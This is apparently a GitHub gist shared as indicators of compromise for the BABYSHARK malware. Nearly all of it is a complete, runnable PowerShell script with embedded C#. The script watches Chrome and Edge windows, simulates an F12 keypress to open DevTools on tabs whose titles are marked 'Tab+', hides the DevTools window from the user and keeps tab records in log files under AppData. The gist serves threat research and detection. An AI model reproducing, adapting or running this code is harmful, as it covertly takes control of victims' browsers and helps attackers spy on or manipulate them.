-
-
Save JohnHammond/d017e8d3f83093f48bb7188fefa79b00 to your computer and use it in GitHub Desktop.
BABYSHARK malware indicators of compromise
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -TypeDefinition @" | |
using System; | |
using System.IO; | |
using System.Text; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Windows.Forms; | |
namespace g1 | |
{ | |
public static class P1 | |
{ | |
public static void M1() | |
{ | |
//------------ chrome -------------- | |
string devsign = "Tab+"; | |
StringBuilder tabid_info_chrome = new StringBuilder("nowjohnstart"); | |
StringBuilder tabid_chrome_file = new StringBuilder("",250); | |
SHGetFolderPath(0,26 ,0,0,tabid_chrome_file); | |
tabid_chrome_file.Append("\\Microsoft\\tabid_chrome.log"); | |
if(File.Exists(tabid_chrome_file.ToString())) | |
{ | |
tabid_info_chrome.Clear(); | |
tabid_info_chrome.Append(File.ReadAllText(tabid_chrome_file.ToString())); | |
} | |
//------------- edge --------------- | |
StringBuilder tabid_info_edge = new StringBuilder("nowjohnstart"); | |
StringBuilder tabid_edge_file = new StringBuilder("",250); | |
SHGetFolderPath(0,26 ,0,0,tabid_edge_file); | |
tabid_edge_file.Append("\\Microsoft\\tabid_edge.log"); | |
if(File.Exists(tabid_edge_file.ToString())) | |
{ | |
tabid_info_edge.Clear(); | |
tabid_info_edge.Append(File.ReadAllText(tabid_edge_file.ToString())); | |
} | |
while(1==1) | |
{ | |
//------------- chrome --------------- | |
if(Process.GetProcessesByName("chrome").Length == 0) | |
{ | |
tabid_info_chrome.Clear(); | |
tabid_info_chrome.Append("nowjohnstart"); | |
File.Delete(tabid_chrome_file.ToString()); | |
} | |
//------------- edge --------------- | |
if(Process.GetProcessesByName("msedge").Length == 0) | |
{ | |
if(Process.GetProcessesByName("microsoftedge").Length == 0) | |
{ | |
tabid_info_edge.Clear(); | |
tabid_info_edge.Append("nowjohnstart"); | |
File.Delete(tabid_edge_file.ToString()); | |
} | |
} | |
IntPtr hWnd = IntPtr.Zero; | |
hWnd = GetForegroundWindow(); | |
if (hWnd == IntPtr.Zero) | |
{ | |
continue; | |
} | |
uint PID; | |
GetWindowThreadProcessId(hWnd,out PID); | |
Process pp = Process.GetProcessById((int)PID); | |
string processpath = pp.ProcessName; | |
StringBuilder title = new StringBuilder(256); | |
GetWindowText(hWnd, title, 256); | |
if((processpath.ToString().ToLower() == "chrome") && (title.ToString().ToLower().IndexOf("devtools") == -1)) | |
{ | |
title.Clear(); | |
GetWindowText(hWnd, title, 256); | |
bool dev_click_flag = false; | |
if(title.ToString().ToLower().IndexOf(devsign.ToLower()) != -1) | |
{ | |
dev_click_flag = true; | |
foreach(string tabid in tabid_info_chrome.ToString().Split(';')) | |
{ | |
if(title.ToString().ToLower().IndexOf(tabid.ToLower()) != -1) | |
{ | |
dev_click_flag = false; | |
Console.WriteLine("exist tabid"); | |
break; | |
} | |
} | |
} | |
if(dev_click_flag == true) | |
{ | |
Console.WriteLine("no exist tabid, click"); | |
dev_click_flag = false; | |
int john_strpos = title.ToString().ToLower().IndexOf(devsign.ToLower()); | |
tabid_info_chrome.Append(';' + title.ToString().Substring(john_strpos)); | |
using (StreamWriter logFile = File.CreateText(tabid_chrome_file.ToString())) | |
{ | |
logFile.Write(tabid_info_chrome); | |
} | |
//PostMessage(hWnd, (int)0x100, (IntPtr)0x7B, (IntPtr)0); | |
keybd_event((byte)0x7b, 0, (int)(0), 0); | |
Sleep(10); | |
keybd_event((byte)0x7b, 0, (int)(2), 0); | |
//PostMessage(hWnd, (int)0x101, (IntPtr)0x7B, (IntPtr)0); | |
int times = 0; | |
bool dev_flag = true; | |
while((dev_flag == true)&&(times < 700)) | |
{ | |
IntPtr hWnd_dev = GetForegroundWindow(); | |
StringBuilder title_dev = new StringBuilder(256); | |
GetWindowText(hWnd_dev, title_dev, 256); | |
if(title_dev.ToString().ToLower().IndexOf("devtools") != -1) | |
{ | |
Console.WriteLine("hide devtool"); | |
ShowWindow(hWnd_dev, 0); | |
dev_flag = false; | |
times = 0; | |
Sleep(1500); | |
} | |
Sleep(10); | |
times = times + 1; | |
} | |
} | |
Sleep(10); | |
} | |
else if((processpath.ToString().ToLower() == "applicationframehost" || processpath.ToString().ToLower() == "microsoftedge" || processpath.ToString().ToLower() == "msedge") && (title.ToString().ToLower().IndexOf("devtools") == -1)) | |
{ | |
title.Clear(); | |
GetWindowText(hWnd, title, 256); | |
bool dev_click_flag = false; | |
if(title.ToString().ToLower().IndexOf(devsign.ToLower()) != -1) | |
{ | |
dev_click_flag = true; | |
foreach(string tabid in tabid_info_edge.ToString().Split(';')) | |
{ | |
if(title.ToString().ToLower().IndexOf(tabid.ToLower()) != -1) | |
{ | |
dev_click_flag = false; | |
Console.WriteLine("exist tabid"); | |
break; | |
} | |
} | |
} | |
if(dev_click_flag == true) | |
{ | |
Console.WriteLine("no exist tabid, click"); | |
dev_click_flag = false; | |
int john_strpos = title.ToString().ToLower().IndexOf(devsign.ToLower()); | |
tabid_info_edge.Append(';' + title.ToString().Substring(john_strpos)); | |
using (StreamWriter logFile = File.CreateText(tabid_edge_file.ToString())) | |
{ | |
logFile.Write(tabid_info_edge); | |
} | |
//PostMessage(hWnd, (int)0x100, (IntPtr)0x7B, (IntPtr)0); | |
keybd_event((byte)0x7b, 0, (int)(0), 0); | |
Sleep(10); | |
keybd_event((byte)0x7b, 0, (int)(2), 0); | |
//PostMessage(hWnd, (int)0x101, (IntPtr)0x7B, (IntPtr)0); | |
int times = 0; | |
bool dev_flag = true; | |
while((dev_flag == true)&&(times < 700)) | |
{ | |
IntPtr hWnd_dev = GetForegroundWindow(); | |
StringBuilder title_dev = new StringBuilder(256); | |
GetWindowText(hWnd_dev, title_dev, 256); | |
if(title_dev.ToString().ToLower().IndexOf("devtools") != -1) | |
{ | |
Console.WriteLine("hide devtool"); | |
ShowWindow(hWnd_dev, 0); | |
dev_flag = false; | |
times = 0; | |
Sleep(1500); | |
} | |
Sleep(10); | |
times = times + 1; | |
} | |
} | |
Sleep(10); | |
} | |
else | |
{ | |
Sleep(3000); | |
Console.WriteLine("BackgroundWindow's not Chrome.exe or Edge.exe"); | |
} | |
} | |
} | |
[DllImport("user32.dll")]static extern bool ShowWindow(IntPtr hW,int nC); | |
[DllImport("kernel32")]public static extern void Sleep(uint dM); | |
[DllImport("User32.dll")]public static extern int FindWindow(string sC,string sW); | |
[DllImport("user32.dll", CharSet = CharSet.Auto)]public static extern int GetWindowText(IntPtr hWnd, StringBuilder title, int size); | |
[DllImport("user32.dll")]public static extern IntPtr GetForegroundWindow(); | |
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount); | |
[DllImport("user32.dll")]public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); | |
[DllImport("user32.dll")]public static extern bool PostMessage(IntPtr WindowHandle, int Msg, IntPtr wParam, IntPtr lParam); | |
[DllImport("User32.dll")] | |
public static extern void keybd_event(byte vk, byte scan, int flags, int extra); | |
[DllImport("shell32.dll")] | |
public static extern uint SHGetFolderPath(uint hwnd, uint csidl, uint hToken,uint dwFlags,System.Text.StringBuilder pszSubDir); | |
} | |
} | |
"@ -ReferencedAssemblies System.Windows.Forms; | |
[g1.P1]::M1(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment